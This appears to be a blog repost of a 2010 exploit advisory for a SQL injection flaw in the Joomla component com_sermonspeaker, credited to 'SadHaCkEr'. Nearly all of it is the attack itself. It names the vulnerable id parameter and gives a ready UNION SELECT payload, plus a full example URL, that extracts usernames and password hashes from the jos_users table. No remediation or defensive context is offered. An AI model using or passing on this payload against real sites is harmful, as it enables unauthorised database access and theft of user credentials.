tattoos

Thursday, April 22, 2010

Component com_sermonspeaker SQLi

# Author: SadHaCkEr
# Data  : 2010-04-12

[~] Vulnerable : http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]

[~] ExploiT : -9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

[~] Example : http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

No comments:

Post a Comment

 

blogger templates | Blogger